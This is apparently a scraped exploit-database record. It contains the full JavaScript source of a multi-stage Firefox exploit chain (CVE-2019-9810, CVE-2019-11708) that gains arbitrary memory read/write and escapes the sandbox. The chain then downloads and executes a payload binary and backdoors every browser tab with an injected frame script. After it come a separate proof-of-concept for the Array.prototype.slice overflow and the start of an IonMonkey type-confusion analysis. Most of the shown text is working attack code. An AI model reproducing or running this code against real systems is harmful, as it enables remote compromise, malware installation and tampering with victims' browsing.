https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\r\n\r\n// 0:000> ? xul!sAutomationPrefIsSet - xul\r\n// Evaluate expression: 85724947 = 00000000`051c0f13\r\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\r\n// 0:000> ? 
xul!disabledForTest - xul\r\n// Evaluate expression: 85400792 = 00000000`05171cd8\r\nconst XuldisabledForTest = 0x05171cd8n;\r\n\r\nconst Debug = false;\r\nconst dbg = p => {\r\n if(Debug == false) {\r\n return;\r\n }\r\n\r\n print(`Debug: ${p}`);\r\n};\r\n\r\nconst ArraySize = 0x5;\r\nconst WantedArraySize = 0x42424242;\r\n\r\nlet arr = null;\r\nlet Trigger = false;\r\nconst Spray = [];\r\n\r\nfunction f(Special, Idx, Value) {\r\n arr[Idx] = 0x41414141;\r\n Special.slice();\r\n arr[Idx] = Value;\r\n}\r\n\r\nclass SoSpecial extends Array {\r\n static get [Symbol.species]() {\r\n return function() {\r\n if(!Trigger) {\r\n return;\r\n }\r\n\r\n arr.length = 0;\r\n for(let i = 0; i < 0x40000; i++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n };\r\n }\r\n};\r\n\r\nfunction GetMeBiggie() {\r\n for(let Idx = 0; Idx < 0x100000; Idx++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n\r\n const SpecialSnowFlake = new SoSpecial();\r\n for(let Idx = 0; Idx < 10; Idx++) {\r\n arr = new Array(0x7e);\r\n Trigger = false;\r\n for(let Idx = 0; Idx < 0x400; Idx++) {\r\n f(SpecialSnowFlake, 0x70, Idx);\r\n }\r\n\r\n Trigger = true;\r\n f(SpecialSnowFlake, 47, WantedArraySize);\r\n if(arr.length != 0) {\r\n continue;\r\n }\r\n\r\n const Biggie = Spray.find(e => e.length != ArraySize);\r\n if(Biggie != null) {\r\n return Biggie;\r\n }\r\n }\r\n\r\n return null;\r\n}\r\n\r\nfunction ExploitCVE_2019_9810() {\r\n print = console.log;\r\n\r\n const Biggie = GetMeBiggie();\r\n if(Biggie == null || Biggie.length != WantedArraySize) {\r\n dbg('Failed to set things up :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Scan for one of the Uint32Array we sprayed earlier.\r\n //\r\n\r\n let Biggie2AdjacentSize = null;\r\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\r\n for(let Idx = 0; Idx < 0x100; Idx++) {\r\n const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\r\n if(Qword == JSValueArraySize) {\r\n Biggie2AdjacentSize = Idx + 1;\r\n 
break;\r\n }\r\n }\r\n\r\n if(Biggie2AdjacentSize == null) {\r\n dbg('Failed to find an adjacent array :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Use the array length as a marker.\r\n //\r\n\r\n const AdjacentArraySize = 0xbbccdd;\r\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\r\n\r\n //\r\n // Find the array now..\r\n //\r\n\r\n const AdjacentArray = Spray.find(\r\n e => e.length == AdjacentArraySize\r\n );\r\n\r\n if(AdjacentArray == null) {\r\n dbg('Failed to find the corrupted adjacent array :(.');\r\n return false;\r\n }\r\n\r\n const ReadPtr = Addr => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Read arbitrary location now.\r\n //\r\n\r\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return Ptr;\r\n };\r\n\r\n const WritePtr = (Addr, Value) => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Write to arbitrary location now.\r\n //\r\n\r\n AdjacentArray[0] = Number(Value & 
0xffffffffn);\r\n AdjacentArray[1] = Number(Value >> 32n);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return true;\r\n };\r\n\r\n const AddrOf = Obj => {\r\n AdjacentArray.hell_on_earth = Obj;\r\n // 0:000> dqs 1ae5716e76a0\r\n // 00001ae5`716e76a0 00001ae5`7167dfd0\r\n // 00001ae5`716e76a8 000010c5`8e73c6a0\r\n // 00001ae5`716e76b0 00000238`9334e790\r\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\r\n // 00001ae5`716e76c0 fffa0000`00000000\r\n // 00001ae5`716e76c8 fff88000`00bbccdd\r\n // 0:000> !telescope 0x00002389334e790\r\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\r\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\r\n const SlotsAddress = BigInt.fromUint32s(\r\n Biggie.slice(SlotOffset, SlotOffset + 2)\r\n );\r\n\r\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\r\n };\r\n\r\n //\r\n // Let's move the battle field to the TenuredHeap\r\n //\r\n\r\n const ArrayBufferLength = 10;\r\n const AB1 = new ArrayBuffer(ArrayBufferLength);\r\n const AB2 = new ArrayBuffer(ArrayBufferLength);\r\n const AB1Address = AddrOf(AB1);\r\n const AB2Address = AddrOf(AB2);\r\n\r\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\r\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\r\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\r\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\r\n\r\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\r\n dbg('Corrupting the ArrayBuffers failed :(.');\r\n return false;\r\n }\r\n\r\n const Primitives = BuildPrimitives(AB1, AB2);\r\n Math.atan2(AB2);\r\n\r\n //\r\n // All right, time to clean up behind ourselves.\r\n // Let's fix AdjacentArray's size first (as we are using Biggie to do it).\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = ArraySize;\r\n\r\n //\r\n // Let's fix 
Biggie's length as we are done with it.\r\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\r\n // Detected xul.dll, using it as js module.\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\r\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\r\n //\r\n // 0:000> !telescope 0x11e6fa2f7580\r\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\r\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\r\n // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\r\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\r\n //\r\n\r\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\r\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\r\n\r\n //\r\n // From there, we're kinda done - let's get god mode and fuck off.\r\n //\r\n\r\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\r\n return true;\r\n}\r\n\r\n//\r\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\r\n// `docShell` object off the `window` object. 
Once it has it, it can grab the frame\r\n// `messageManager` that we need to trigger the sandbox escape.\r\n//\r\n\r\nfunction GetContentFrameMessageManager(Win) {\r\n function _GetDocShellFromWindow(Win) {\r\n return Win.docShell;\r\n }\r\n\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n const Cu = Components.utils;\r\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\r\n const Code = _GetDocShellFromWindow.toSource();\r\n Cu.evalInSandbox(Code, Sbx);\r\n const DocShell = Sbx._GetDocShellFromWindow(Win);\r\n Cu.nukeSandbox(Sbx);\r\n return DocShell.messageManager;\r\n}\r\n\r\n//\r\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\r\n// with an URI.\r\n//\r\n\r\nfunction PromptOpen(Uri) {\r\n const FrameMM = GetContentFrameMessageManager(window);\r\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\r\n return Result;\r\n}\r\n\r\n//\r\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\r\n// process and escape the sandbox.\r\n//\r\n\r\nfunction TriggerCVE_2019_11708() {\r\n PromptOpen(`${location.origin}?stage3`);\r\n}\r\n\r\n//\r\n// This is the function that gets written into the frame script the exploit drops\r\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\r\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\r\n// Services.mm.loadFrameScript('file://frame-script.js', true)\r\n// This should break in the `Browser Content Toolbox` debugger window.\r\n//\r\n\r\nfunction FrameScriptPayload() {\r\n function PimpMyDocument() {\r\n\r\n //\r\n // Don't infect doar-e and leave Cthulhu alone...\r\n //\r\n\r\n if(content.document.location.origin == 'https://doar-e.github.io' ||\r\n content.document.location.origin == 'http://localhost:8000') {\r\n return;\r\n }\r\n\r\n //\r\n // .. 
as well as don't play with non http origins (I've seen empty/null origins).\r\n //\r\n\r\n if(!content.document.location.origin.startsWith('http')) {\r\n return;\r\n }\r\n\r\n //\r\n // Time to party! Let's find every `A` tag and make them point to doar-e.\r\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\r\n // style attributes to `none` / `transparent` to not hide the doar-e background.\r\n //\r\n\r\n for(const Node of content.document.getElementsByTagName('*')) {\r\n if(Node.tagName == 'A') {\r\n Node.href = 'https://doar-e.github.io/';\r\n continue;\r\n }\r\n\r\n Node.style.backgroundImage = 'none';\r\n Node.style.backgroundColor = 'transparent';\r\n }\r\n\r\n //\r\n // Change the background.\r\n //\r\n\r\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\r\n }\r\n\r\n //\r\n // First we set an event handler to make sure to be invoked when a new `content`\r\n // is created. Keep in mind that we basically have ~three cases to handle:\r\n // 1/ We are getting injected in an already existing tab,\r\n // 2/ We are getting injected in a new tab,\r\n // 3/ A user clicks on a link and a new `content` gets created.\r\n // We basically want to have control over those three events. 
The below ensures\r\n // we get a chance to execute code for 2/.\r\n //\r\n\r\n addEventListener('DOMWindowCreated', FrameScriptPayload);\r\n dump(`Hello from: ${content.location.origin}\\n`);\r\n\r\n if(content.document != null && content.document.body != null) {\r\n\r\n //\r\n // Either the tab already existed in which case we already have a document which we\r\n // can play with...\r\n //\r\n\r\n PimpMyDocument();\r\n return;\r\n }\r\n\r\n //\r\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\r\n //\r\n\r\n content.addEventListener('load', PimpMyDocument);\r\n}\r\n\r\n//\r\n// This function drops a file (open + write + close) using the OSFile JS module.\r\n//\r\n\r\nfunction DropFile(Path, Content) {\r\n\r\n //\r\n // We expect either a string or a TypedArray.\r\n //\r\n\r\n const Encoder = new TextEncoder();\r\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\r\n return OS.File.open(Path, {write: true, truncate: true})\r\n .then(File => {\r\n return Promise.all([\r\n // We return the File object in order to be able to use it in the\r\n // next `.then`. 
This allows us to chain the `write` and the `close`\r\n // without another level of deepness.\r\n File,\r\n File.write(ContentBuffer),\r\n ]);\r\n })\r\n .then((Results) => {\r\n const [File, _WrittenBytes] = Results;\r\n return File.close();\r\n });\r\n}\r\n\r\n//\r\n// This function drops / executes a payload binary, as well as inject a frame script\r\n// into every tabs.\r\n//\r\n\r\nfunction Payload() {\r\n\r\n //\r\n // Import a bunch of JS modules we will be using later.\r\n //\r\n\r\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n\r\n //\r\n // First order of business, we create a first promise that downloads the payload\r\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\r\n //\r\n\r\n const Dir = OS.Constants.Path.localProfileDir;\r\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\r\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\r\n .then((Response) => {\r\n\r\n //\r\n // We return the result as a TypedArray as this is what `DropFile`\r\n // expects for binary content.\r\n //\r\n\r\n return Response.arrayBuffer();\r\n })\r\n .then((Content) => {\r\n\r\n //\r\n // Time to drop the file now. Note that we return the promise so\r\n // the next `then` executes when the file has been successfully dropped.\r\n //\r\n\r\n dbg(`Payload downloaded.`);\r\n return DropFile(PayloadPath, new Uint8Array(Content));\r\n })\r\n .then(() => {\r\n\r\n //\r\n // At this point, we are ready to spawn the payload, let's do it!\r\n //\r\n\r\n dbg(`Creating the process.. ${PayloadPath}`);\r\n CreateProcessA(PayloadPath);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in payload promise: ${Ex}`);\r\n });\r\n\r\n //\r\n // Second order of business is to backdoor the tabs. 
To do so, we drop a frame\r\n // script that we inject into every tabs.\r\n //\r\n\r\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\r\n\r\nFrameScriptPayload();`;\r\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\r\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\r\n .then(() => {\r\n\r\n //\r\n // At this time we are ready to inject the frame script into the tabs.\r\n // Note that we need to drop the file locally / use the file:// scheme\r\n // so that the tabs accept to interpret the file (unfortunately,\r\n // remote ones are ignored).\r\n //\r\n\r\n dbg(`About to loadFrameScript: ${ScriptPath}`);\r\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in frame payload promise: ${Ex}`);\r\n });\r\n\r\n\r\n //\r\n // Last but not least, we set up code to execute on completion of both the above\r\n // promises. You have to remember that at this point the modal window is still open\r\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\r\n // to be as stealth as possible.\r\n // Just for kicks, we spawn a calculator when we're done because why not.\r\n //\r\n\r\n Promise.all([PayloadPromise, FramePayloadPromise])\r\n .then(() => {\r\n\r\n //\r\n // .. just for kicks.\r\n //\r\n\r\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\r\n\r\n //\r\n // Phew, we made it here let's close the window :).\r\n //\r\n\r\n window.close();\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in clean up promise: ${Ex}`);\r\n window.close();\r\n });\r\n}\r\n\r\n//\r\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\r\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\r\n// god mode. 
It's far from being the cleanest way, but this is the easiest way I found.\r\n//\r\n// nsresult nsSocketTransport::InitiateSocket() {\r\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\r\n// nsresult rv;\r\n// bool isLocal;\r\n// IsLocal(&isLocal);\r\n// if (gIOService->IsNetTearingDown()) {\r\n// return NS_ERROR_ABORT;\r\n// }\r\n// if (gIOService->IsOffline()) {\r\n// if (!isLocal) return NS_ERROR_OFFLINE;\r\n// } else if (!isLocal) {\r\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\r\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\r\n// nsAutoCString ipaddr;\r\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\r\n// netaddr->GetAddress(ipaddr);\r\n// fprintf_stderr(\r\n// stderr,\r\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\r\n// \"connection \"\r\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\r\n// \"available via the test networking proxy (if running mochitests) \"\r\n// \"or from a test-specific httpd.js server (if running xpcshell \"\r\n// \"tests). \"\r\n// \"Browser services should be disabled or redirected to a local \"\r\n// \"server.\\n\",\r\n// mHost.get(), ipaddr.get());\r\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\r\n// }\r\n// }\r\n//\r\n\r\nfunction PatchInitiateSocket() {\r\n\r\n //\r\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // so that it doesn't assert on us because we turned on testing features.\r\n // This is the assert we hit without the patch:\r\n //\r\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\r\n // You should only access hostnames available via the test networking proxy\r\n // (if running mochitests) or from a test-specific httpd.js server (if running\r\n // xpcshell tests). 
Browser services should be disabled or redirected to a local\r\n // server.\r\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\r\n // 00007ff9`69a66372 cc int 3\r\n //\r\n // Here is the disasembly before:\r\n //\r\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\r\n //\r\n // And after:\r\n //\r\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 90 nop\r\n // 00007ff9`3f9c55c7 90 nop\r\n // 00007ff9`3f9c55c8 90 nop\r\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n //\r\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\r\n // Evaluate expression: 1529286 = 00000000`001755c6\r\n //\r\n\r\n const PatchOffset = 0x001755c6n;\r\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\r\n const PatchAddress = XulBase + PatchOffset;\r\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\r\n PatchCode(PatchAddress, PatchContent);\r\n}\r\n\r\nfunction Main(Route) {\r\n\r\n //\r\n // One way to tell if we were successful with our data corruption is by checking\r\n // if we have access to the PrivilegeManager. 
If we do, it means we are running\r\n // with a privileged context, if not we don't.\r\n //\r\n\r\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\r\n if(Route == '?stage1') {\r\n\r\n //\r\n // If we are asked to run stage1 with access to a privileged context, we skip\r\n // it and move on to stage2.\r\n //\r\n\r\n if(RunningFromPrivilegedJS) {\r\n return Main('?stage2');\r\n }\r\n\r\n //\r\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\r\n // a privileged JS context.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Failed :(');\r\n return;\r\n }\r\n\r\n //\r\n // Once we are done with the data corruption, we refresh the page to get access\r\n // to the privileged JS context. Moving on to stage2 \\o/.\r\n //\r\n\r\n location.replace(`${location.origin}/?stage2`);\r\n }\r\n\r\n if(Route == '?stage2') {\r\n\r\n //\r\n // At this point we expect to have access to a privileged JS context.\r\n // If we don't it's probably bad news, so we'll just bail.\r\n //\r\n\r\n if(!RunningFromPrivilegedJS) {\r\n alert('problem');\r\n return;\r\n }\r\n\r\n //\r\n // Turn on privileges so that we can access the `Components` object.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // Now that we have access to the privileged context, we are also able to talk\r\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\r\n // exploit the parent process.\r\n //\r\n\r\n TriggerCVE_2019_11708();\r\n }\r\n\r\n if(Route == '?stage3') {\r\n\r\n //\r\n // We should now be running in the broker which means we can exploit CVE-2019-9810\r\n // to perform the same attack than in stage1 but this time in the parent process.\r\n //\r\n\r\n 
if(!ExploitCVE_2019_9810()) {\r\n console.log('Elevation failed, closing the window.');\r\n window.close();\r\n }\r\n\r\n //\r\n // If we are successful it means that by refreshing the page, we should have\r\n // access to the privileged JS context from the parent process.\r\n // This basically means full compromise and we move on to backdooring the tabs,\r\n // as well as dropping the payload.\r\n //\r\n\r\n location.replace(`${location.origin}/?final`);\r\n }\r\n\r\n if(Route == '?final') {\r\n\r\n //\r\n // All right, we start of by turning on privileges so that we can access `Components`\r\n // & cie.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // We've worked hard to get here and it's time to drop the goodies :).\r\n //\r\n\r\n Payload();\r\n }\r\n}\r\n\r\nfunction Onload() {\r\n if(location.search != '') {\r\n Main(location.search);\r\n }\r\n}\n\n# 0day.today [2019-12-09] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33639"}], "packetstorm": [{"lastseen": "2019-03-28T22:53:29", "description": "", "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Firefox Array.prototype.slice Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152251", "href": "https://packetstormsecurity.com/files/152251/Firefox-Array.prototype.slice-Buffer-Overflow.html", "sourceData": "`<script> \n \nlet size = 64; \n \ngarr = []; \nj = 0; \nfunction gc(){ \nvar tmp = []; \nfor(let i = 0;i < 0x20000;i++){ \ntmp[i] = new Uint32Array(size * 2); \nfor(let j = 0;j < (size*2);j+=2){ \ntmp[i][j] = 0x12345678; \ntmp[i][j+1] = 0xfffe0123; \n} \n} \ngarr[j++] = tmp; \n} \n \nlet arr = [{},2.2]; \n \nlet obj 
= {}; \n \nobj[Symbol.species] = function(){ \nvictim.length = 0x0; \nfor(let i = 0;i < 0x2000;i++){ \ngvictim[i].length = 0x0; \ngvictim[i] = null; \n} \ngc(); \n//Array.isArray(garr[0][0x10000]); \nreturn [1.1]; \n} \n \nlet gvictim = []; \n \nfor(let i = 0;i < 0x1000;i++){ \ngvictim[i] = [1.1,2.2]; \ngvictim[i].length = size; \ngvictim[i].fill(3.3); \n} \n \nlet victim = [1.1,2.2]; \nvictim.length = size; \nvictim.fill(3.3); \n \nfor(let i = 0x1000;i < 0x2000;i++){ \ngvictim[i] = [1.1,2.2]; \ngvictim[i].length = size; \ngvictim[i].fill(3.3); \n} \n \nfunction fake(arg){ \n} \nfor(let i = 0;i < size;i++){ \nfake[\"x\"+i.toString()] = 2.2; \n} \n \nfunction jit(){ \nvictim[1] = 1.1; \narr.slice(); \n//fake.x2 = 6.17651672645e-312; \nreturn victim[2]; \n} \n \nflag = 0; \n \n \nfor(let i = 0;i < 0x10000;i++){ \nxx = jit(); \n} \n \narr.constructor = obj; \n \nArray.isArray(victim); \nalert(333); \nalert(jit()); \n</script> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152251/ffaps-overflow.txt"}, {"lastseen": "2019-03-30T11:26:16", "description": "", "published": "2019-03-29T00:00:00", "type": "packetstorm", "title": "SpiderMonkey IonMonkey Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-03-29T00:00:00", "id": "PACKETSTORM:152304", "href": "https://packetstormsecurity.com/files/152304/SpiderMonkey-IonMonkey-Type-Confusion.html", "sourceData": "`SpiderMonkey: IonMonkey compiled code fails to update inferred property types, leading to type confusions \n \nRelated CVE Numbers: CVE-2019-9813 \n \n \n \nA bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects. \n \n# Prerequisites \n \nIn Spidermonkey, every JavaScript objects is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. 
ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically: \n \n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below) \n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot \n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array \n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored \n \nSpidermonkey makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\\\"widens\\\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \\\"type barriers\\\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code. 
\n \n# Crashing Testcase \n \nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties: \n \nfunction hax(o, changeProto) { \nif (changeProto) { \no.p = 42; \no.__proto__ = {}; \n} \no.p = 13.37; \nreturn o; \n} \n \nfor (let i = 0; i < 1000; i++) { \nhax({}, false); \n} \n \nfor (let i = 0; i < 10000; i++) { \nlet o = hax({}, true); \neval('o.p'); \\t\\t\\t// Crash here \n} \n \n \nCrashes in debug builds of Spidermonkey with: \n \nAssertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265 \nHit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266 \n \nThis assertion expresses that type inference data is inconsistent for the property .p as the type \\\"float\\\" is not in the list of possible types but the property currently holds a float value. \n \n# Bug Analysis \n \nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment. \n \nIn detail, the following appears to be happening: \n \nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value. \n \nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. 
